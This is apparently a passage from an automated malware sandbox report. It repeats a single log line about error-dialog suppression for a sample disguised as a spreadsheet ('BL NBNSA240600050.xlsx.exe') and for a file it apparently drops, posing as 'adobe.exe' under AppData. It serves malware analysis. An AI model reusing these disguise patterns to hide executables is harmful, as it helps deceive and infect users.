                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOX
